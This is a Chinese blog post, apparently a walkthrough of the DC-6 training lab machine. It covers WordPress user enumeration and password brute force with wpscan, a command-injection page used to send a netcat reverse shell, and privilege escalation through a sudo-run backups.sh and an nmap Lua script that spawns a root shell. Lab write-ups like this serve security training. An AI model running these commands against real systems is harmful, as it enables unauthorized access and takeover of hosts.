[vulhub靶机通关]DC-6(命令执行_nmap提权)

DC-6靶机渗透:命令执行与nmap提权

信息收集

主机探测

端口扫描

扫描网站结构

是cms wordpress

用自带的wpscan 扫描网站的用户名

wpscan -url http://wordy -e u

在靶机页面有提示

我们复制过来 同时将得到的用户名复制

cat /usr/share/wordlists/rockyou.txt| grep k01 > password1.txt

wpscan --url http://wordy -U user1.txt -P password1.txt 

扫出来一个账号 mark helpdesk01

扫描网站

dirb  http://wordy

漏洞利用

寻找了一番 找到一个可以进行命令执行的页面 用bp进行抓包

修改 绕过前端验证

用nc反弹一个shell给kali

在kali上开启监听

nc -lvvp 5678

在home/mark目录下找到了 graham的密码

我们试着su能不能su进去

成功

提权

sudo -l 提示backups.sh无命令可以执行

我们在后面追加/bin/bash获得jens的shell

切换到 jens

sudo -u jens ./backups.sh

查看jens的权限

发现nmap有root权限

写一个shell

echo 'os.execute("/bin/bash")' > getshell

os.execute()相当于system()

用nmap执行

sudo nmap --script=getshell

找到flag

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值